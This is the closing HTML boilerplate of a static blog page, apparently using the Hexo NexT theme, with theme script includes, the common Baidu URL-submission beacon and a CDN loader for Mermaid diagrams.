<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  
  <script>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>













<script>
if (document.querySelectorAll('pre.mermaid').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mermaid@8/dist/mermaid.min.js', () => {
    mermaid.initialize({
      theme    : 'default',
      logLevel : 3,
      flowchart: { curve     : 'linear' },
      gantt    : { axisFormat: '%m/%d/%Y' },
      sequence : { actorMargin: 50 }
    });
  }, window.mermaid);
}
</script>


  

  

</body>
</html>
